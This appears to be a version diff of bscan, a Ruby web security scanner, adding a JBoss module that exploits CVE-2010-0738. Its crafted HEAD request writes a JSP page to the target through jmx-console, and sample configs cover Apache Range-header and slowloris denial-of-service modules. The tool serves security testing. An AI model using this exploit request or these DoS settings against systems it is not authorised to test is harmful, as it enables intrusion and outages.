bscan 2.0.0 → 2.0.1

data/CONFIG.rdoc

@@ -61,6 +61,10 @@ to 'true', the detailed zipped report will be attached. You'll ned
   by special separators (see inject_instead_of param below)
 * many_threads.rb - runs a static query in multiple threads. Can repeat
   patterns multiple times to increase impact on a server
+* kill_apache.rb - exploits HTTP header range vuln
+* slowloris.rb - slow HTTP reads and writes
+* jboss_vulns.rb - checks on presence of web-console, jmx-console and 
+  CVE-2010-0738 (jmx-console authentication by-pass)
 
 == injector.rb Module Parameters
 * bscan.injector.file - file with malicious patterns (e.g. Google's fuzzdb)
@@ -153,6 +157,18 @@ a response time and log an issue if a threshold is reached
 * bscan.kill_apache.range_nbr=n
   Number of elements in 'Range' header, default - 500
 
+== jboss_vuln.rb Module Parameters
+The module checks if web-console or jmx-console is present. 
+It also checks if jmx-console authentication can be by-passed
+by injecting a 'hello' page through HTTP method 'HEAD'. 
+To run the last one you need to set inject_page to 'true'.
+
+* bscan.jboss_vulns.hostport=host:port:proto
+  Multiple entries for this param are OK
+* bscan.jboss_vulns.inject_page=true
+  Set this to true to try by-passing jmx-console auth. It will
+  try to inject a harmless HTML page @ /hello/hello.jsp
+
 == Burp Parameters
 To get a list of all Burp parameters, set log level (--loglevel to 2 or 3)
 and you'll see all of them in a log file.

data/VERSION

@@ -1 +1 @@
-2.0.0
+2.0.1

data/lib/bscan/modules/jboss_vulns.rb

@@ -0,0 +1,80 @@
+require 'bscan/utils/bscan_helper.rb'
+
+module JbossVulns
+
+  def run *args
+    @prop_pref = 'bscan.jboss_vulns.'
+    @prop_pref += args[2] + '.' if args[2] && args[2].length > 0
+    @mid = args[2]?"JbossVulns.#{args[2]}.":'JbossVulns.' 
+    begin
+      injectf = get_par 'inject_page', true
+      hostports = get_par 'hostport',nil,true
+      raise "'hostport' param must be provided" if not hostports
+      hostports = [hostports] if not hostports.kind_of?(Array)
+      
+      hostports.each do |hp|
+        host,port,proto = hp.split(':', 3)
+        port = '80' if not port
+        port = port.to_i
+        proto = (port == 443 ? 'https':'http') if not proto
+        https = (proto == 'https')
+
+        Log 2, "#{@mid}run input: #{host} #{port} #{proto} #{injectf}"
+        
+        url = "#{proto}://#{host}:#{port}"
+        
+        reqb = "GET /jmx-console HTTP/1.1\r\n"
+        reqe = "Host: #{host}:#{port}\r\n" +
+               "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n\r\n"
+        issue = Issue.new "#{@mid.chop}: JBoss Vuln Found", url, "Low", "Firm", nil, nil,nil 
+
+        rsp = make_request_socket host, port, https, reqb + reqe
+        Log 2, "#{@mid}run jmx-console: #{reqb + reqe} #{rsp}"
+        status = $1 if rsp =~ /^HTTP\/[^\s]+\s+(\d\d\d)/i
+        if status != '404'
+          issue.issue_detail = "/jmx-console is enabled"
+          issue.url = url + "/jmx-console"
+          issue.http_messages = [Message.new(reqb+reqe,rsp)]
+          write_issue_state issue
+        end   
+
+        reqb = "GET /web-console HTTP/1.1\r\n"
+        rsp = make_request_socket host, port, https, reqb + reqe
+        Log 2, "#{@mid}run web-console: #{reqb+reqe} #{rsp}"
+        status = $1 if rsp =~ /^HTTP\/[^\s]+\s+(\d\d\d)/i
+        if status != '404'
+          issue.issue_detail = "/web-console is enabled"
+          issue.url = url + "/web-console"
+          issue.http_messages = [Message.new(reqb+reqe,rsp)]
+          write_issue_state issue
+        end   
+        if injectf
+          reqb = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&" +
+          "name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=hello.war&"+
+          "argType=java.lang.String&arg1=hello&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&"+
+          "arg3=%3CHTML%3E%3CBODY%3EHello%2C%20we've%20got%20a%20problem%20here!%3C%2FBODY%3E%3C%2FHTML%3E&argType=boolean&arg4=True "+
+          "HTTP/1.1\r\n"
+          Log 2, "#{@mid}run trying to inject hello: #{reqb+reqe} #{rsp}"
+          rsp = make_request_socket host, port, https, reqb + reqe
+          status = $1 if rsp =~ /^HTTP\/[^\s]+\s+(\d\d\d)/i
+          if status != '404' 
+            regb = "GET /hello/hello.jsp HTTP/1.1\r\n"
+            rsp = make_request_socket host, port, https, reqb + reqe
+            if status == '200'
+              issue.severity = 'Critical'
+              issue.url = url + "/hello/hello.jsp"
+              issue.issue_detail = "This JBoss instance is vulnerable to authentication by-pass and arbitrary code injection " +
+                                    "as described here: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738 "+
+                                    "A test page has been injected at the following location: #{issue.url}"
+              issue.http_messages = [Message.new(reqb+reqe,rsp)]
+              write_issue_state issue
+            end
+          end
+         end
+        end   
+    rescue Exception => e
+       Log 0, "#{@mid}run Exception: #{e.message}"
+       Log 0, e.backtrace.join("\n")  
+    end
+  end
+end

data/lib/bscan/utils/bscan_helper.rb

@@ -59,11 +59,11 @@ module BscanHelper
       @prop_pref + nm   
   end
   
-  def get_par k,defv
+  def get_par k,defv,str=false
     p = @bscan_config[prop(k)] 
-    p = p.to_i if p and p.to_i.to_s == p
-    p = true if p == 'true' or p == 'yes'
-    p = false if p == 'false' or p == 'no'
+    p = p.to_i if !str && p && p.to_i.to_s == p
+    p = true if !str && (p == 'true' or p == 'yes')
+    p = false if !str && (p == 'false' or p == 'no')
     p ? p:defv 
   end
   

data/release_notes.txt

@@ -1,3 +1,9 @@
+== 2.0.1
+jbos_vulns.rb module added. It checks on:
+* Presence of /web-console
+* Presence of /jmx-console
+* CVE-2010-0738
+
 == 2.0.0
 Two major improvements:
 * Modules with static requests do not require Burp or Buby anymore

data/samples/config/big_request.txt

@@ -4,7 +4,7 @@ Accept: */*^M
 Accept-Language: en^M
 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)^M
 Connection: close^M
-Referer: http://asol.selfip.com/p^M
+Referer: http://myserver.selfip.com/p^M
 Content-Type: application/x-www-form-urlencoded^M
 Content-Length: 14^M
 Cookie: JSESSIONID=583A7E5D1FE791D694BBAA1ACC10EBB8^M

data/samples/config/conf

@@ -7,6 +7,19 @@ bscan.modules=bscan/modules/slowloris.rb
 bscan.url=http://target.one.com/path/?param=val
 bscan.url=http://target.two.com/path/?param=val
 
+# BScan smtp settings
+bscan.smtp.server=smtp.server.com
+bscan.smtp.port=25
+bscan.smtp.to=one@mail.com,two@mail.com
+bscan.smtp.from=bscan@server.com
+bscan.smtp.include_report=true
+
+#JbossVulns settings
+bscan.jboss_vulns.hostport=target.one.com:443:https
+bscan.jboss_vulns.hostport=target.two.com
+bscan.jboss_vulns.inject_page=true
+
+
 #KillApache settings
 bscan.kill_apache.hostport=target.one.com:443
 bscan.kill_apache.protocol=https
@@ -17,8 +30,6 @@ bscan.kill_apache.read_timeout=10
 bscan.kill_apache.range_nbr=500
 bscan.kill_apache.static_request=true
 
-
-
 #Slowloris settings: port is mandatory in 'hostport' param
 bscan.slowloris.hostport=target.three.com:443
 bscan.slowloris.protocol=https
@@ -28,9 +39,10 @@ bscan.slowloris.response_time_factor=5
 bscan.slowloris.sleep_time=200
 bscan.slowloris.con_nbr_per_thread=50
 bscan.slowloris.pack_per_con=10
+bscan.slowloris.health_check_int=2
+bscan.slowloris.delay_on_write=true
 bscan.slowloris.static_request=true
 
-
 # Injector settings
 bscan.injector.one.file=samples/config/injector.txt
 bscan.injector.one.inject_to_body=true

metadata

@@ -2,14 +2,14 @@
 name: bscan
 version: !ruby/object:Gem::Version
   prerelease:
-  version: 2.0.0
+  version: 2.0.1
 platform: ruby
 authors:
 - Oleg Gryb (ogryb)
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2012-08-22 00:00:00.000000000 Z
+date: 2012-08-25 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: buby
@@ -43,9 +43,9 @@ files:
 - Rakefile
 - VERSION
 - bin/bscan
-- bscan.gemspec
 - lib/bscan.rb
 - lib/bscan/modules/injector.rb
+- lib/bscan/modules/jboss_vulns.rb
 - lib/bscan/modules/kill_apache.rb
 - lib/bscan/modules/many_threads.rb
 - lib/bscan/modules/slowloris.rb

data/bscan.gemspec

@@ -1,65 +0,0 @@
-# Generated by jeweler
-# DO NOT EDIT THIS FILE DIRECTLY
-# Instead, edit Jeweler::Tasks in Rakefile, and run 'rake gemspec'
-# -*- encoding: utf-8 -*-
-
-Gem::Specification.new do |s|
-  s.name = "bscan"
-  s.version = "2.0.0"
-
-  s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
-  s.authors = ["Oleg Gryb (ogryb)"]
-  s.date = "2012-08-22"
-  s.description = "BScan is a configurable and extendable web application security scanner that can be run from a command line headless (without UI). It's built on top of arguably the most popular commercial security testing tool Burp Suite from PortSwigger and Buby from Eric Monti and Timur Duehr"
-  s.email = "oleg@gryb.info"
-  s.executables = ["bscan"]
-  s.extra_rdoc_files = [
-    "CONFIG.rdoc",
-    "README.rdoc",
-    "bin/bscan",
-    "release_notes.txt"
-  ]
-  s.files = [
-    "CONFIG.rdoc",
-    "README.rdoc",
-    "Rakefile",
-    "VERSION",
-    "bin/bscan",
-    "bscan.gemspec",
-    "lib/bscan.rb",
-    "lib/bscan/modules/injector.rb",
-    "lib/bscan/modules/kill_apache.rb",
-    "lib/bscan/modules/many_threads.rb",
-    "lib/bscan/modules/slowloris.rb",
-    "lib/bscan/utils/bscan_helper.rb",
-    "lib/bscan/utils/mailer.rb",
-    "release_notes.txt",
-    "samples/config/big_request.txt",
-    "samples/config/conf",
-    "samples/config/injector.txt",
-    "samples/config/request.txt",
-    "samples/config/xss.txt",
-    "samples/headless-bscan.sh",
-    "test.sh",
-    "test/bscan_test.rb"
-  ]
-  s.homepage = "http://gryb.info/bscan"
-  s.rdoc_options = ["--main", "README.rdoc"]
-  s.require_paths = ["lib"]
-  s.rubygems_version = "1.8.24"
-  s.summary = "BScan is an extendable and configurable command line web application security scanner"
-  s.test_files = ["test/bscan_test.rb"]
-
-  if s.respond_to? :specification_version then
-    s.specification_version = 3
-
-    if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
-      s.add_runtime_dependency(%q<buby>, [">= 1.3.1"])
-    else
-      s.add_dependency(%q<buby>, [">= 1.3.1"])
-    end
-  else
-    s.add_dependency(%q<buby>, [">= 1.3.1"])
-  end
-end
-